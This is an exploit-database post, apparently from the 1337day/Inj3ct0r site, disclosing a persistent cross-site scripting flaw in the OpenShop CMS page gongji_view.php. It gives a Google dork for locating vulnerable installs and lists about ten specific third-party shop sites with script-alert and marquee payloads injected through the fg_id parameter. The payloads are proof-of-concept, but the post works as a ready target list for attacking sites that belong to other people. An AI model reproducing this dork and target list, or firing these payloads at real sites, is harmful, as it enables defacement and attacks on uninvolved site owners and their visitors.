Home / exploits OpenShop Cross Site Scripting
Posted on 04 April 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> OpenShop - Persistent XSS Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< staff@thecybernuxbie.com >>> CP: +62856-2538-963 [ www.thecybernuxbie.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By OpenShop: http://www.openshop.co.nz/ - Google Dork: inurl:"/gongji_view.php?fg_id=" - Exploit Concept: http://lokalisasi/gongji_view.php?fg_id=[XSS] - Sample Web Persistent XSS Vulnerability: http://lovecast.co.nz/shop/gongji_view.php?fg_id=<marquee><font color=red size=15>XSSed By Nuxbie</font></marquee> <:- [XSS] http://momdadme.com/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://joongboomarket.com/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://moonshinart.com/mall/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://english.bros.co.kr/shop/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://wigplus.com/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://kimsresalefurniture.com/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://edsys.co.kr/mall/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://tokeimall.com/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] http://jinsungdiary.com/mall/gongji_view.php?fg_id=<script>alert(31337);</script> <:- [XSS] -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################
